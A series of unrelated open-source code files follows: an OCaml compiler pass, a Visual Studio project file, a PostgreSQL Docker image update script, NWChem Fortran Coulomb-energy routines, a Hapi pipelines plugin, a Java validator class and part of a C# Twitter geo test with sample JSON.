= expr t ([ty], Ist.Eid x) in let t, idl1 = tuple t e in let idl2 = make_idl tyl in let t = equation t idl2 (Est.Eapply (b, fk, x, idl1)) in t, idl2 | Eseq (e1, e2) -> let t, _ = expr t e1 in let t, idl = tuple t e2 in t, idl | Eswap (e1, e2, e3) -> let t, e1 = expr t e1 in let t, e2 = expr t e2 in let t, e3 = expr t e3 in let idl2 = make_idl tyl in let t = equation t idl2 (Est.Eswap (e1, e2, e3)) in t, idl2 | e -> simpl_expr t tyl e and simpl_expr t tyl e = let x = new_id() in let ty = lone tyl in let id = ty, x in let t, e = simpl_expr_ t ty e in let t = equation t [id] e in t, [id] and simpl_expr_ t ty = function | Evalue v -> t, Est.Evalue v | Evariant (x, e') -> let t, idl = tuple t e' in t, Est.Evariant (x, idl) | Ebinop (bop, e1, e2) -> let t, id1 = expr t e1 in let t, id2 = expr t e2 in t, Est.Ebinop (bop, id1, id2) | Euop (uop, e) -> let t, id = expr t e in t, Est.Euop (uop, id) | Erecord fdl -> let t, fdl = lfold field t fdl in t, Est.Erecord fdl | Ewith (e, fdl) -> let t, id = expr t e in let t, fdl = lfold field t fdl in t, Est.Ewith (id, fdl) | Efree (ty, x) -> t, Est.Efree (ty, x) | Eset (e1, e2, e3) -> let t, e1 = expr t e1 in let t, e2 = expr t e2 in let t, e3 = expr t e3 in t, Est.Eset (e1, e2, e3) | Eget (e1, e2) -> let t, e1 = expr t e1 in let t, e2 = expr t e2 in t, Est.Eget (e1, e2) | Epartial (f, e) -> let t, f = expr t f in let t, idl = tuple t e in t, Est.Epartial (f, idl) | Efun _ -> assert false | (Eseq (_, _)|Eapply (_, _, _, _, _)|Eif (_, _, _)|Elet (_, _, _)|Ematch (_, _) | Efield (_, _)|Eid _) | Eswap _ -> assert false and field t (x, e) = let t, idl = tuple t e in t, (x, idl) and action (p, e) (t, acc) = let eqs, p = ExtractRecords.pat [] p in let t, label = make_block t eqs e in let pll = SplitPat.pat p in let pll = List.fold_right (fun p acc -> pat [p] label :: acc) pll [] in let pl = List.flatten pll in t, pl @ acc and equation t idl e = { t with eqs = (idl, e) :: t.eqs } and make_block t record_eqs e = let eqs = t.eqs in let t = { t with eqs = record_eqs } in let t, idl = tuple t e in let bl = block t.eqs (Est.Lreturn idl) in let t = { t with blocks = bl :: t.blocks } in let t = { t with eqs = eqs } in let label = Est.Ecall bl.Est.bl_id in t, label and ematch depth t tyl e = match e with | Est.Ecall _ -> t, e | Est.Ematch (c, al) -> let t, al = lfold (fun t (p, a) -> let t, a = ematch (depth+1) t tyl a in t, (p, a)) t al in let idl = make_idl tyl in let ematch = Est.Ematch (c, al) in if depth = 0 then t, ematch else let bl = block [idl, ematch] (Est.Lreturn idl) in let t = { t with blocks = bl :: t.blocks } in t, Est.Ecall bl.Est.bl_id | _ -> assert false
{ "pile_set_name": "Github" }
<?xml version="1.0" encoding="utf-8"?> <Project DefaultTargets="Build" ToolsVersion="15.0" xmlns="http://schemas.microsoft.com/developer/msbuild/2003"> <ItemGroup Label="ProjectConfigurations"> <ProjectConfiguration Include="Debug|Win32"> <Configuration>Debug</Configuration> <Platform>Win32</Platform> </ProjectConfiguration> <ProjectConfiguration Include="Release|Win32"> <Configuration>Release</Configuration> <Platform>Win32</Platform> </ProjectConfiguration> <ProjectConfiguration Include="Debug|x64"> <Configuration>Debug</Configuration> <Platform>x64</Platform> </ProjectConfiguration> <ProjectConfiguration Include="Release|x64"> <Configuration>Release</Configuration> <Platform>x64</Platform> </ProjectConfiguration> </ItemGroup> <PropertyGroup Label="Globals"> <ProjectGuid>{1FBC19A7-9FF0-4BA3-915C-993BADD7D080}</ProjectGuid> <RootNamespace>waifu2x_snowshell</RootNamespace> <WindowsTargetPlatformVersion>10.0</WindowsTargetPlatformVersion> </PropertyGroup> <Import Project="$(VCTargetsPath)\Microsoft.Cpp.Default.props" /> <PropertyGroup Condition="'$(Configuration)|$(Platform)'=='Debug|Win32'" Label="Configuration"> <ConfigurationType>Application</ConfigurationType> <UseDebugLibraries>true</UseDebugLibraries> <PlatformToolset>v142</PlatformToolset> <CharacterSet>Unicode</CharacterSet> </PropertyGroup> <PropertyGroup Condition="'$(Configuration)|$(Platform)'=='Release|Win32'" Label="Configuration"> <ConfigurationType>Application</ConfigurationType> <UseDebugLibraries>false</UseDebugLibraries> <PlatformToolset>v142</PlatformToolset> <WholeProgramOptimization>true</WholeProgramOptimization> <CharacterSet>Unicode</CharacterSet> </PropertyGroup> <PropertyGroup Condition="'$(Configuration)|$(Platform)'=='Debug|x64'" Label="Configuration"> <ConfigurationType>Application</ConfigurationType> <UseDebugLibraries>true</UseDebugLibraries> <PlatformToolset>v142</PlatformToolset> <CharacterSet>MultiByte</CharacterSet> </PropertyGroup> <PropertyGroup Condition="'$(Configuration)|$(Platform)'=='Release|x64'" Label="Configuration"> <ConfigurationType>Application</ConfigurationType> <UseDebugLibraries>false</UseDebugLibraries> <PlatformToolset>v142</PlatformToolset> <WholeProgramOptimization>true</WholeProgramOptimization> <CharacterSet>Unicode</CharacterSet> </PropertyGroup> <Import Project="$(VCTargetsPath)\Microsoft.Cpp.props" /> <ImportGroup Label="ExtensionSettings"> </ImportGroup> <ImportGroup Label="Shared"> </ImportGroup> <ImportGroup Label="PropertySheets" Condition="'$(Configuration)|$(Platform)'=='Debug|Win32'"> <Import Project="$(UserRootDir)\Microsoft.Cpp.$(Platform).user.props" Condition="exists('$(UserRootDir)\Microsoft.Cpp.$(Platform).user.props')" Label="LocalAppDataPlatform" /> </ImportGroup> <ImportGroup Label="PropertySheets" Condition="'$(Configuration)|$(Platform)'=='Release|Win32'"> <Import Project="$(UserRootDir)\Microsoft.Cpp.$(Platform).user.props" Condition="exists('$(UserRootDir)\Microsoft.Cpp.$(Platform).user.props')" Label="LocalAppDataPlatform" /> </ImportGroup> <ImportGroup Label="PropertySheets" Condition="'$(Configuration)|$(Platform)'=='Debug|x64'"> <Import Project="$(UserRootDir)\Microsoft.Cpp.$(Platform).user.props" Condition="exists('$(UserRootDir)\Microsoft.Cpp.$(Platform).user.props')" Label="LocalAppDataPlatform" /> </ImportGroup> <ImportGroup Label="PropertySheets" Condition="'$(Configuration)|$(Platform)'=='Release|x64'"> <Import Project="$(UserRootDir)\Microsoft.Cpp.$(Platform).user.props" Condition="exists('$(UserRootDir)\Microsoft.Cpp.$(Platform).user.props')" 
Label="LocalAppDataPlatform" /> </ImportGroup> <PropertyGroup Label="UserMacros" /> <PropertyGroup /> <ItemDefinitionGroup Condition="'$(Configuration)|$(Platform)'=='Debug|Win32'"> <ClCompile> <WarningLevel>Level3</WarningLevel> <Optimization>Disabled</Optimization> <SDLCheck>true</SDLCheck> <RuntimeLibrary>MultiThreadedDebug</RuntimeLibrary> </ClCompile> </ItemDefinitionGroup> <ItemDefinitionGroup Condition="'$(Configuration)|$(Platform)'=='Debug|x64'"> <ClCompile> <WarningLevel>Level3</WarningLevel> <Optimization>Disabled</Optimization> <SDLCheck>true</SDLCheck> </ClCompile> </ItemDefinitionGroup> <ItemDefinitionGroup Condition="'$(Configuration)|$(Platform)'=='Release|Win32'"> <ClCompile> <WarningLevel>Level3</WarningLevel> <Optimization>MaxSpeed</Optimization> <FunctionLevelLinking>true</FunctionLevelLinking> <IntrinsicFunctions>true</IntrinsicFunctions> <SDLCheck>true</SDLCheck> <RuntimeLibrary>MultiThreaded</RuntimeLibrary> </ClCompile> <Link> <EnableCOMDATFolding>true</EnableCOMDATFolding> <OptimizeReferences>true</OptimizeReferences> <AdditionalManifestDependencies>type='win32' name='Microsoft.Windows.Common-Controls' version='6.0.0.0' processorArchitecture='*' publicKeyToken='6595b64144ccf1df' language='*';%(AdditionalManifestDependencies)</AdditionalManifestDependencies> <EntryPointSymbol>wWinMainCRTStartup</EntryPointSymbol> </Link> </ItemDefinitionGroup> <ItemDefinitionGroup Condition="'$(Configuration)|$(Platform)'=='Release|x64'"> <ClCompile> <WarningLevel>Level3</WarningLevel> <Optimization>MaxSpeed</Optimization> <FunctionLevelLinking>true</FunctionLevelLinking> <IntrinsicFunctions>true</IntrinsicFunctions> <SDLCheck>true</SDLCheck> <RuntimeLibrary>MultiThreaded</RuntimeLibrary> </ClCompile> <Link> <EnableCOMDATFolding>true</EnableCOMDATFolding> <OptimizeReferences>true</OptimizeReferences> </Link> </ItemDefinitionGroup> <ItemGroup> <ClCompile Include="Converter.cpp" /> <ClCompile Include="ConvertOption.cpp" /> <ClCompile Include="LocaleString.cpp" /> <ClCompile Include="SnowSetting.cpp" /> <ClCompile Include="Main.cpp" /> </ItemGroup> <ItemGroup> <ClInclude Include="Converter.h" /> <ClInclude Include="ConvertOption.h" /> <ClInclude Include="LocaleString.h" /> <ClInclude Include="Main.h" /> <ClInclude Include="resource.h" /> <ClInclude Include="SnowSetting.h" /> </ItemGroup> <ItemGroup> <ResourceCompile Include="waifu2x_snowshell.rc" /> </ItemGroup> <ItemGroup> <Image Include="Bitmap\BG.bmp" /> <Image Include="Bitmap\BG_Japanese.bmp" /> <Image Include="Bitmap\BG_Korean.bmp" /> <Image Include="Bitmap\BG_Chinese.bmp" /> <Image Include="Bitmap\BG_Portuguese.bmp" /> <Image Include="Bitmap\ICON.ico" /> </ItemGroup> <ItemGroup> <None Include="Lang\Chinese.ini" /> <None Include="Lang\English.ini" /> <None Include="Lang\German.ini" /> <None Include="Lang\Japanese.ini" /> <None Include="Lang\Korean.ini" /> <None Include="Lang\Portuguese.ini" /> <None Include="Lang\Swedish.ini" /> </ItemGroup> <Import Project="$(VCTargetsPath)\Microsoft.Cpp.targets" /> <ImportGroup Label="ExtensionTargets"> </ImportGroup> </Project>
{ "pile_set_name": "Github" }
#!/bin/bash set -Eeuo pipefail cd "$(dirname "$(readlink -f "$BASH_SOURCE")")" versions=( "$@" ) if [ ${#versions[@]} -eq 0 ]; then versions=( */ ) fi versions=( "${versions[@]%/}" ) defaultDebianSuite='buster-slim' declare -A debianSuite=( # https://github.com/docker-library/postgres/issues/582 [9.4]='stretch-slim' [9.5]='stretch-slim' [9.6]='stretch-slim' [10]='stretch-slim' [11]='stretch-slim' ) defaultAlpineVersion='3.12' declare -A alpineVersion=( #[9.6]='3.5' ) packagesBase='http://apt.postgresql.org/pub/repos/apt/dists/' declare -A suitePackageList=() suiteVersionPackageList=() suiteArches=() _raw_package_list() { local suite="$1"; shift local component="$1"; shift local arch="$1"; shift curl -fsSL "$packagesBase/$suite-pgdg/$component/binary-$arch/Packages.bz2" | bunzip2 } fetch_suite_package_list() { local suite="$1"; shift local version="$1"; shift local arch="$1"; shift # normal (GA) releases end up in the "main" component of upstream's repository if [ -z "${suitePackageList["$suite-$arch"]:+isset}" ]; then local suiteArchPackageList suiteArchPackageList="$(_raw_package_list "$suite" 'main' "$arch")" suitePackageList["$suite-$arch"]="$suiteArchPackageList" fi # ... but pre-release versions (betas, etc) end up in the "PG_MAJOR" component (so we need to check both) if [ -z "${suiteVersionPackageList["$suite-$version-$arch"]:+isset}" ]; then local versionPackageList versionPackageList="$(_raw_package_list "$suite" "$version" "$arch")" suiteVersionPackageList["$suite-$version-$arch"]="$versionPackageList" fi } awk_package_list() { local suite="$1"; shift local version="$1"; shift local arch="$1"; shift awk -F ': ' -v version="$version" "$@" <<<"${suitePackageList["$suite-$arch"]}"$'\n'"${suiteVersionPackageList["$suite-$version-$arch"]}" } fetch_suite_arches() { local suite="$1"; shift if [ -z "${suiteArches["$suite"]:+isset}" ]; then local suiteRelease suiteRelease="$(curl -fsSL "$packagesBase/$suite-pgdg/Release")" suiteArches["$suite"]="$(gawk <<<"$suiteRelease" -F ':[[:space:]]+' '$1 == "Architectures" { print $2; exit }')" fi } for version in "${versions[@]}"; do tag="${debianSuite[$version]:-$defaultDebianSuite}" suite="${tag%%-slim}" majorVersion="${version%%.*}" fetch_suite_package_list "$suite" "$version" 'amd64' fullVersion="$( awk_package_list "$suite" "$version" 'amd64' ' $1 == "Package" { pkg = $2 } $1 == "Version" && pkg == "postgresql-" version { print $2; exit } ' )" if [ -z "$fullVersion" ]; then echo >&2 "error: missing postgresql-$version package!" 
exit 1 fi fetch_suite_arches "$suite" versionArches= for arch in ${suiteArches["$suite"]}; do fetch_suite_package_list "$suite" "$version" "$arch" archVersion="$( awk_package_list "$suite" "$version" "$arch" ' $1 == "Package" { pkg = $2 } $1 == "Version" && pkg == "postgresql-" version { print $2; exit } ' )" if [ "$archVersion" = "$fullVersion" ]; then [ -z "$versionArches" ] || versionArches+=' | ' versionArches+="$arch" fi done echo "$version: $fullVersion ($versionArches)" cp docker-entrypoint.sh "$version/" sed -e 's/%%PG_MAJOR%%/'"$version"'/g;' \ -e 's/%%PG_VERSION%%/'"$fullVersion"'/g' \ -e 's/%%DEBIAN_TAG%%/'"$tag"'/g' \ -e 's/%%DEBIAN_SUITE%%/'"$suite"'/g' \ -e 's/%%ARCH_LIST%%/'"$versionArches"'/g' \ Dockerfile-debian.template \ > "$version/Dockerfile" if [ "$majorVersion" = '9' ]; then sed -i -e 's/WALDIR/XLOGDIR/g' \ -e 's/waldir/xlogdir/g' \ "$version/docker-entrypoint.sh" # ICU support was introduced in PostgreSQL 10 (https://www.postgresql.org/docs/10/static/release-10.html#id-1.11.6.9.5.13) sed -i -e '/icu/d' "$version/Dockerfile" else # postgresql-contrib-10 package does not exist, but is provided by postgresql-10 # Packages.gz: # Package: postgresql-10 # Provides: postgresql-contrib-10 sed -i -e '/postgresql-contrib-/d' "$version/Dockerfile" fi if [ "$majorVersion" != '13' ]; then sed -i -e '/DEBIAN_FRONTEND/d' "$version/Dockerfile" fi # TODO figure out what to do with odd version numbers here, like release candidates srcVersion="${fullVersion%%-*}" # change "10~beta1" to "10beta1" for ftp urls tilde='~' srcVersion="${srcVersion//$tilde/}" srcSha256="$(curl -fsSL "https://ftp.postgresql.org/pub/source/v${srcVersion}/postgresql-${srcVersion}.tar.bz2.sha256" | cut -d' ' -f1)" for variant in alpine; do if [ ! -d "$version/$variant" ]; then continue fi cp docker-entrypoint.sh "$version/$variant/" sed -i 's/gosu/su-exec/g' "$version/$variant/docker-entrypoint.sh" sed -e 's/%%PG_MAJOR%%/'"$version"'/g' \ -e 's/%%PG_VERSION%%/'"$srcVersion"'/g' \ -e 's/%%PG_SHA256%%/'"$srcSha256"'/g' \ -e 's/%%ALPINE-VERSION%%/'"${alpineVersion[$version]:-$defaultAlpineVersion}"'/g' \ "Dockerfile-$variant.template" \ > "$version/$variant/Dockerfile" if [ "$majorVersion" = '9' ]; then sed -i -e 's/WALDIR/XLOGDIR/g' \ -e 's/waldir/xlogdir/g' \ "$version/$variant/docker-entrypoint.sh" # ICU support was introduced in PostgreSQL 10 (https://www.postgresql.org/docs/10/static/release-10.html#id-1.11.6.9.5.13) sed -i -e '/icu/d' "$version/$variant/Dockerfile" fi if [ "$majorVersion" -gt 11 ]; then sed -i '/backwards compat/d' "$version/$variant/Dockerfile" fi if [ "$majorVersion" -lt 11 ]; then # JIT / LLVM is only supported in PostgreSQL 11+ (https://github.com/docker-library/postgres/issues/475) sed -i '/llvm/d' "$version/$variant/Dockerfile" fi done done
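The generation step above reduces to sed-based placeholder substitution over a shared template; a standalone illustration of that mechanism (the template line here is hypothetical, the real ones live in Dockerfile-debian.template):

# Hypothetical one-line template, substituted the same way update.sh does it.
echo 'FROM debian:%%DEBIAN_TAG%%' | sed -e 's/%%DEBIAN_TAG%%/buster-slim/g'
# -> FROM debian:buster-slim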
{ "pile_set_name": "Github" }
* * $Id$ * subroutine c_coulomb_init() implicit none #include "bafdecls.fh" #include "c_coulomb_common.fh" * **** local variables **** integer npack0,nfft3d,G(3) integer i,j,k integer zero,qzero,pzero,taskid integer nx,ny real*8 fourpi,gg logical value integer tmp1(2) * **** external functions **** * real*8 G(nfft3d,3) integer c_G_indx external c_G_indx call nwpw_timing_start(7) call C3dB_nfft3d(1,nfft3d) call Cram_npack(0,npack0) G(1) = c_G_indx(1) G(2) = c_G_indx(2) G(3) = c_G_indx(3) * **** allocate vc memory **** value = BA_alloc_get(mt_dbl,npack0,'vc',vc_hndl,vc_indx) if (.not. value) > call errquit('c_coulomb_init:out of heap memory',0,0) value = BA_push_get(mt_dbl,nfft3d,'tmp1',tmp1(2),tmp1(1)) if (.not. value) > call errquit('c_coulomb_init:out of stack memory',0,0) call Parallel3d_taskid_i(taskid) call C3dB_nx(1,nx) call C3dB_ny(1,ny) * ***** find the G==0 point in the lattice ***** i=0 j=0 k=0 c call C3dB_ktoqp(1,k+1,qzero,pzero) c zero = (qzero-1)*(nx)*ny c > + j*(nx) c > + i+1 call C3dB_ijktoindexp(1,i+1,j+1,k+1,zero,pzero) * ***** form Vc = 4*pi/G**2 ***** fourpi = 4.0d0*(4.0d0*datan(1.0d0)) do i = 1,nfft3d gg = ( dbl_mb(G(1)+i-1)*dbl_mb(G(1)+i-1) > + dbl_mb(G(2)+i-1)*dbl_mb(G(2)+i-1) > + dbl_mb(G(3)+i-1)*dbl_mb(G(3)+i-1) ) if ((pzero.eq.taskid) .and. (i.eq.zero)) then dbl_mb(tmp1(1)+i-1) = 0.0d0 else dbl_mb(tmp1(1)+i-1) = fourpi/gg end if end do call Cram_r_pack(0,dbl_mb(tmp1(1))) call Cram_r_Copy(0,dbl_mb(tmp1(1)),dbl_mb(vc_indx)) value = BA_pop_stack(tmp1(2)) call nwpw_timing_end(7) return end subroutine c_coulomb_end() implicit none #include "bafdecls.fh" #include "c_coulomb_common.fh" logical value value = BA_free_heap(vc_hndl) return end subroutine c_coulomb_v(dng,vc_out) implicit none complex*16 dng(*) complex*16 vc_out(*) #include "bafdecls.fh" #include "c_coulomb_common.fh" call nwpw_timing_start(7) call Cram_rc_Mul(0,dbl_mb(vc_indx),dng,vc_out) call nwpw_timing_end(7) return end real*8 function c_coulomb_e(dng) implicit none complex*16 dng(*) #include "bafdecls.fh" #include "c_coulomb_common.fh" * **** local variables **** integer npack0 real*8 ec c real*8 tmp1(*) integer tmp1(2) logical value * **** external functions **** real*8 lattice_omega external lattice_omega call nwpw_timing_start(7) call Cram_npack(0,npack0) value = BA_push_get(mt_dbl,npack0,'tmp1',tmp1(2),tmp1(1)) if (.not. value) > call errquit('c_coulomb_e:out of stack memory',0,0) call Cram_cr_Sqr(0,dng,dbl_mb(tmp1(1))) call Cram_rr_dot(0,dbl_mb(tmp1(1)),dbl_mb(vc_indx),ec) ec = 0.5d0*ec*lattice_omega() value = BA_pop_stack(tmp1(2)) call nwpw_timing_end(7) c_coulomb_e = ec return end subroutine c_coulomb_euv(dng,euv) implicit none complex*16 dng(*) real*8 euv(3,3) #include "bafdecls.fh" #include "errquit.fh" #include "c_coulomb_common.fh" * **** local variables **** integer npack0,nfft3d,G(2,3) integer i,j integer u,v,s logical value real*8 pi,fourpi,scal,ss,sum real*8 hm(3,3),Bus(3,3),ecoul integer tmp1(2),tmp2(2) * **** external functions **** integer c_G_indx external c_G_indx real*8 lattice_unitg,lattice_omega,c_coulomb_e external lattice_unitg,lattice_omega,c_coulomb_e pi = 4.0d0*datan(1.0d0) fourpi = 4.0d0*pi scal = 1.0d0/(2.0d0*pi) * *** define hm **** do j=1,3 do i=1,3 hm(i,j) = scal*lattice_unitg(i,j) end do end do call C3dB_nfft3d(1,nfft3d) call Cram_npack(0,npack0) value = BA_push_get(mt_dbl,nfft3d, > 'G1',G(2,1),G(1,1)) if (.not. value) > call errquit('c_coulomb_euv:out of stack memory',0,MA_ERR) value = BA_push_get(mt_dbl,nfft3d, > 'G2',G(2,2),G(1,2)) if (.not. 
value) > call errquit('c_coulomb_euv:out of stack memory',0,MA_ERR) value = BA_push_get(mt_dbl,nfft3d, > 'G3',G(2,3),G(1,3)) if (.not. value) > call errquit('c_coulomb_euv:out of stack memory',0,MA_ERR) value = BA_push_get(mt_dbl,npack0,'tmp1',tmp1(2),tmp1(1)) if (.not. value) > call errquit('c_coulomb_euv:out of stack memory',0,MA_ERR) value = BA_push_get(mt_dbl,npack0,'tmp2',tmp2(2),tmp2(1)) if (.not. value) > call errquit('c_coulomb_euv:out of stack memory',0,MA_ERR) call dcopy(nfft3d,dbl_mb(c_G_indx(1)),1,dbl_mb(G(1,1)),1) call dcopy(nfft3d,dbl_mb(c_G_indx(2)),1,dbl_mb(G(1,2)),1) call dcopy(nfft3d,dbl_mb(c_G_indx(3)),1,dbl_mb(G(1,3)),1) call Cram_r_pack(0,dbl_mb(G(1,1))) call Cram_r_pack(0,dbl_mb(G(1,2))) call Cram_r_pack(0,dbl_mb(G(1,3))) * **** tmp2(G) = (n(G)**2) * (4*pi/G**2)**2 **** call Cram_cr_Sqr(0,dng,dbl_mb(tmp1(1))) call Cram_rr_Mul(0,dbl_mb(tmp1(1)),dbl_mb(vc_indx), > dbl_mb(tmp2(1))) c call Cram_rr_Mul(0,dbl_mb(tmp2(1)),dbl_mb(vc_indx), c > dbl_mb(tmp2(1))) call Cram_rr_Mul2(0,dbl_mb(vc_indx),dbl_mb(tmp2(1))) * **** Bus = Sum(G) (omega/4*pi)*tmp2(G)*Gu*Gs **** call dcopy(9,0.0d0,0,Bus,1) ss = lattice_omega()/fourpi do u=1,3 do s=u,3 call Cram_rr_Mul(0,dbl_mb(G(1,u)), > dbl_mb(G(1,s)), > dbl_mb(tmp1(1))) call Cram_rr_dot(0,dbl_mb(tmp1(1)),dbl_mb(tmp2(1)),sum) Bus(u,s) = ss*sum end do end do do u=1,3 do s=u+1,3 Bus(s,u) = Bus(u,s) end do end do ecoul = c_coulomb_e(dng) do v=1,3 do u=1,3 euv(u,v) = -ecoul*hm(u,v) do s=1,3 euv(u,v) = euv(u,v) + Bus(u,s)*hm(s,v) end do end do end do value = BA_pop_stack(tmp2(2)) value = BA_pop_stack(tmp1(2)) value = BA_pop_stack(G(2,3)) value = BA_pop_stack(G(2,2)) value = BA_pop_stack(G(2,1)) return end
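Written out as equations, c_coulomb_init fills the reciprocal-space Coulomb kernel and c_coulomb_e contracts it with the squared density; the G = 0 term is zeroed, matching the pzero/zero special case in the code. Here Omega is lattice_omega() and n(G) is dng; this is a reading aid, not part of the source:

\[
  V_c(\mathbf{G}) = \frac{4\pi}{|\mathbf{G}|^{2}}, \qquad V_c(\mathbf{0}) = 0,
  \qquad
  E_c = \frac{\Omega}{2} \sum_{\mathbf{G}} \bigl|n(\mathbf{G})\bigr|^{2}\, V_c(\mathbf{G})
\]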
{ "pile_set_name": "Github" }
'use strict'; const createRoute = require('./create'); const updateRoute = require('./update'); const removeRoute = require('./remove'); const syncRoute = require('./sync'); const syncWebhooksRoute = require('./syncWebhooks'); const syncPRsRoute = require('./syncPRs'); const getRoute = require('./get'); const listRoute = require('./list'); const badgeRoute = require('./badge'); const jobBadgeRoute = require('./jobBadge'); const listJobsRoute = require('./listJobs'); const listTriggersRoute = require('./listTriggers'); const listSecretsRoute = require('./listSecrets'); const listEventsRoute = require('./listEvents'); const startAllRoute = require('./startAll'); const createToken = require('./tokens/create'); const updateToken = require('./tokens/update'); const refreshToken = require('./tokens/refresh'); const listTokens = require('./tokens/list'); const removeToken = require('./tokens/remove'); const removeAllTokens = require('./tokens/removeAll'); const metricsRoute = require('./metrics'); const latestBuild = require('./latestBuild'); const getAdmin = require('./admins/get'); const deleteCache = require('./caches/delete'); const openPrRoute = require('./openPr'); /** * Pipeline API Plugin * @method register * @param {Hapi} server Hapi Server */ const pipelinesPlugin = { name: 'pipelines', async register(server) { const statusColor = { unknown: 'lightgrey', disabled: 'lightgrey', created: 'lightgrey', success: 'green', queued: 'blue', blocked: 'blue', running: 'blue', collapsed: 'lightgrey', frozen: 'lightgrey', unstable: 'yellow', failure: 'red', aborted: 'red' }; /** * Returns an encoded string of subject based on separator of the badge service * @method encodeBadgeSubject * @param {String} badgeService badge service url * @param {String} subject subject to put in the badge * @return {String} encodedSubject */ server.expose('encodeBadgeSubject', ({ badgeService, subject }) => { const separator = badgeService.match(/}}(.){{/)[1]; if (separator === '/') { return encodeURIComponent(subject); } // Reference: https://shields.io/ if (separator === '-') { return subject.replace(/-/g, '--').replace(/_/g, '__'); } return subject; }); /** * Returns true if the scope does not include pipeline or includes pipeline * and it's pipelineId matches the pipeline, otherwise returns false * @method isValidToken * @param {String} id ID of pipeline * @param {Object} credentials Credential object from Hapi * @param {String} credentials.pipelineId ID of pipeline which the token is allowed to access * @param {String} credentials.scope Scope whose token is allowed */ server.expose( 'isValidToken', (id, credentials) => !credentials.scope.includes('pipeline') || parseInt(id, 10) === parseInt(credentials.pipelineId, 10) ); server.route([ createRoute(), removeRoute(), updateRoute(), syncRoute(), syncWebhooksRoute(), syncPRsRoute(), getRoute(), listRoute(), badgeRoute({ statusColor }), jobBadgeRoute({ statusColor }), listJobsRoute(), listTriggersRoute(), listSecretsRoute(), listEventsRoute(), startAllRoute(), updateToken(), refreshToken(), createToken(), listTokens(), removeToken(), removeAllTokens(), metricsRoute(), latestBuild(), getAdmin(), deleteCache(), openPrRoute() ]); } }; module.exports = pipelinesPlugin;
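For orientation, here is how the two exposed helpers behave once the plugin is registered; a sketch using Hapi's server.plugins lookup, with a placeholder shields.io-style URL:

// Sketch: server.expose() above makes these available under
// server.plugins.pipelines.* once the plugin is registered.
const subject = server.plugins.pipelines.encodeBadgeSubject({
    badgeService: 'https://img.shields.io/badge/{{subject}}-{{status}}-{{color}}.svg',
    subject: 'my_pipeline-main'
});
// The separator between {{subject}} and {{status}} is '-', so '-' and '_'
// are doubled per the shields.io escaping rules: 'my__pipeline--main'

const valid = server.plugins.pipelines.isValidToken(42, {
    scope: ['pipeline'],
    pipelineId: '42'
});
// true: a pipeline-scoped token whose pipelineId matches the requested pipeline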
{ "pile_set_name": "Github" }
package com.company.mvc.helper;

import java.util.Observable;
import java.util.Observer;

/**
 * @author cbf4Life [email protected]
 * I'm glad to share my knowledge with you all.
 */
public class Checker implements Observer {
    // Which validation strategy to use
    private IXmlValidate validate;

    // Path of the XML configuration file
    String xmlPath;

    // No-arg constructor
    public Checker() {
        // Read the web.xml configuration file to decide which validation strategy to use
        this(null);
    }

    // Strategy passed in through the constructor
    public Checker(IXmlValidate _validate) {
        this.validate = _validate;
    }

    public void setXmlPath(String _xmlPath) {
        this.xmlPath = _xmlPath;
    }

    // Run the check
    public boolean check() {
        return validate.validate(xmlPath);
    }

    public void update(Observable arg0, Object arg1) {
        // Check whether the conditions are met
        // (note: reassigning the arg1 parameter has no effect outside this method)
        arg1 = check();
    }
}
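A sketch of plugging a concrete strategy into Checker; IXmlValidate is declared elsewhere in this project, and here we assume it exposes a single boolean validate(String xmlPath) method. SchemaValidate and the path are illustrative:

// Sketch only: SchemaValidate is a hypothetical strategy implementation.
class SchemaValidate implements IXmlValidate {
    public boolean validate(String xmlPath) {
        // A real implementation would parse and validate the file here.
        return xmlPath != null && xmlPath.endsWith(".xml");
    }
}

class CheckerDemo {
    public static void main(String[] args) {
        Checker checker = new Checker(new SchemaValidate()); // inject the strategy
        checker.setXmlPath("WEB-INF/web.xml");
        System.out.println(checker.check()); // true
    }
}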
{ "pile_set_name": "Github" }
using System; using System.Linq; using LinqToTwitter; using LinqToTwitterPcl.Tests.Common; using LitJson; using Microsoft.VisualStudio.TestTools.UnitTesting; namespace LinqToTwitterPcl.Tests.GeoTests { [TestClass] public class GeoTests { public GeoTests() { TestCulture.SetCulture(); } [TestMethod] public void Geo_Ctor_Parses_JsonData() { var geoJson = JsonMapper.ToObject(ReverseResponse); var geo = new Geo(geoJson); Assert.IsNotNull(geo.Places); var places = geo.Places; Assert.AreEqual(4, places.Count); Assert.AreEqual("neighborhood", places.First().PlaceType); } [TestMethod] public void Geo_Ctor_Returns_On_Null_JsonData() { var geo = new Geo((JsonData)null); Assert.IsNull(geo.Places); } const string ReverseResponse = @"{ ""query"":{ ""type"":""reverse_geocode"", ""params"":{ ""accuracy"":0, ""granularity"":""neighborhood"", ""coordinates"":{ ""type"":""Point"", ""coordinates"":[ -122.4006, 37.78215 ] } }, ""url"":""http:\/\/api.twitter.com\/1\/geo\/reverse_geocode.json?long=-122.4006&accuracy=0&granularity=neighborhood&lat=37.78215"" }, ""result"":{ ""places"":[ { ""contained_within"":[ { ""country"":""United States"", ""place_type"":""city"", ""name"":""San Francisco"", ""bounding_box"":{ ""type"":""Polygon"", ""coordinates"":[ [ [ -122.51368188, 37.70813196 ], [ -122.35845384, 37.70813196 ], [ -122.35845384, 37.83245301 ], [ -122.51368188, 37.83245301 ] ] ] }, ""attributes"":{ }, ""full_name"":""San Francisco, CA"", ""country_code"":""US"", ""url"":""http:\/\/api.twitter.com\/1\/geo\/id\/5a110d312052166f.json"", ""id"":""5a110d312052166f"" } ], ""place_type"":""neighborhood"", ""country"":""United States"", ""name"":""SoMa"", ""full_name"":""SoMa, San Francisco"", ""attributes"":{ }, ""bounding_box"":{ ""type"":""Polygon"", ""coordinates"":[ [ [ -122.42284884, 37.76893497 ], [ -122.3964, 37.76893497 ], [ -122.3964, 37.78752897 ], [ -122.42284884, 37.78752897 ] ] ] }, ""country_code"":""US"", ""url"":""http:\/\/api.twitter.com\/1\/geo\/id\/2b6ff8c22edd9576.json"", ""id"":""2b6ff8c22edd9576"" }, { ""contained_within"":[ { ""country"":""United States"", ""place_type"":""admin"", ""name"":""California"", ""bounding_box"":{ ""type"":""Polygon"", ""coordinates"":[ [ [ -124.482003, 32.528832 ], [ -114.131211, 32.528832 ], [ -114.131211, 42.009517 ], [ -124.482003, 42.009517 ] ] ] }, ""attributes"":{ }, ""full_name"":""California, US"", ""country_code"":""US"", ""url"":""http:\/\/api.twitter.com\/1\/geo\/id\/fbd6d2f5a4e4a15e.json"", ""id"":""fbd6d2f5a4e4a15e"" } ], ""place_type"":""city"", ""country"":""United States"", ""name"":""San Francisco"", ""full_name"":""San Francisco, CA"", 